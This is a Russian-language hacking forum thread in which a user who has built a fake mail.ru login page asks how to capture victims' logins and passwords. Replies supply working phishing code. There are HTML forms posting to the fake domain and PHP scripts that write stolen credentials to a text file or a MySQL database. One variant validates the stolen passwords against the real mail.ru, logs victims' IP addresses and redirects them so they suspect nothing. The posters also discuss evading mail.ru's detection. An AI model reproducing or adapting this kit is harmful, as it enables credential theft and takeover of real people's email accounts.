http://i032.radikal.ru/0806/36/ffcc5cfeb771.jpg (http://www.radikal.ru)

У меня вопрос!!! Я сделал фейк mail.ru как мне сделать письмо как на фото чтоб когда жертва вводит свои данные и нажимает подтвердить
они записовались в базу БД?


Кто так сможет сделать отзовитесь!

Зачем тебе заморочки с БД. Пиши в файл. Например так.

Содержимое нтмл письма (форма отправки данных)

...
<form action="http://фейк_мейл.ру/auth.php" method="POST">
<input type="text" name="login" >Логин<br>
<input type="password" name="pass">Пароль
<input type="submit">
</form>
....


и собственно скрипт записи логина и пасса


<?php
$login=$_POST['login'];
$pass=$_POST['pass'];
$data=$login." ".$pass;
$fh=fopen("data.txt", "a");
fwrite($fh, $data);
fclose($fh);
?>

Зачем тебе заморочки с БД. Пиши в файл. Например так.

Содержимое нтмл письма (форма отправки данных)

...
<form action="http://фейк_мейл.ру/auth.php" method="POST">
<input type="text" name="login" >Логин<br>
<input type="password" name="pass">Пароль
<input type="submit">
</form>
....


и собственно скрипт записи логина и пасса


<?php
$login=$_POST['login'];
$pass=$_POST['pass'];
$data=$login." ".$pass;
$fh=fopen("data.txt", "a");
fwrite($fh, $data);
fclose($fh);
?>
на mail.ru POST не работает поэтому:

<form action="http://фейк_мейл.ру/auth.php" method="GET">
<input type="text" name="login" >Логин<br>
<input type="password" name="pass">Пароль
<input type="submit">


<?php
$login=$_GET['login'];
$pass=$_GET['pass'];
$data=$login.";".$pass."\n";
$fh=fopen("data.txt", "a");
fwrite($fh, $data);
fclose($fh);
Header("Location: http://win.mail.ru/cgi-bin/auth");
exit();
?>

С гетом палево будет (: Увидев в адресной строке адрес вида http://фейк_мейл.ру/auth.php?login=lamer&pass=123456 даже имбицил поймет, что его поимели.

Кстати редирект на http://mail.ru/cgi-bin/ - Forbidden

Насчет поста ниже :
Так я и не спорил (: Я просто предложил заменить редирект на http://win.mail.ru/cgi-bin/auth

Эти все скрипты которые вы написали паляться службой mail.ru

Эти все скрипты которые вы написали паляться службой mail.ru

Имееться ввиду, что бы в письме прислать форму?
Наверно спалят тогда...
Интересно, надо будет проверить позволяет ли мейл.ру отсылать данные гетом(из письма непосредственно)

Вот это письмо как на фото ни как не палиться почему не знаю

еще есть предложения

тоже интересно, присылали недавно такое письмо. я его разобрал хорошенько. код, адрес фэйка, ип того кто слыл узнал=) а повторить не получается. "расширенный формат" криво код преобразует(((

вот самый нормальный вариант фейка.

<?php
error_reporting(0);
$cont = file_get_contents('http://win.mail.ru/cgi-bin/auth?Login='.$_POST['Login'].'&Domain='.$_POST['Domain'].'&Password='.$_POST['Password']);
if(strstr($cont, '<b>Ошибка</b>'))
die(str_replace('action="auth"', '', $cont));

$fo = fopen('mail.lg', 'a');
fwrite($fo, date('d.m.y H:i:s')."\t".$_SERVER['REMOTE_ADDR']."\n");
fwrite($fo, $_POST['Login'].'@'.$_POST['Domain']."\t".$_POST['Password']."\n\n");
fclose($fo);
header('Location: http://win.mail.ru/cgi-bin/auth?Login='.$_POST['Login'].'&Domain='.$_POST['Domain'].'&Password='.$_POST['Password']);
?>

Добавление записей в БД:

Таблица:
CREATE TABLE `mails` (
`id` int(20) NOT NULL auto_increment,
`mail` varchar(100) NOT NULL,
`pass` varchar(100) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=30 DEFAULT CHARSET=cp1251 AUTO_INCREMENT=30 ;


Форма:
<form action="<?=$_SERVER['PHP_SELF']?>" method="post">
<input name="login" type="text" />
<input name="pass" type="password" />
<input type="submit" value="Войти" />
</form>

Скрипт:
<?php
$login = !empty($_POST['login']) && preg_match('/^[a-zA-Z0-9-_\.]+@[a-zA-Z0-9]+\.[a-zA-Z]{2,5}$/', $_POST['login']) ? trim($_POST['login']) : '';
$pass = !empty($_POST['pass']) ? trim($_POST['pass']) : '';
if($login && $pass){
$login = get_magic_quotes_gpc() ? $login : mysql_real_escape_string($login);
$pass = get_magic_quotes_gpc() ? $pass : mysql_real_escape_string($pass);
mysql_connect('localhost', 'user', 'pass');
mysql_select_db('mails');
$sql = mysql_query("INSERT INTO `mails` VALUE(null, '".$login."', '".$pass."')");
if($sql){
header('location: http://mail.ru');
}
}
?>

Тема закрыта во избежании оффтопа, т.к. со взломами в другой раздел.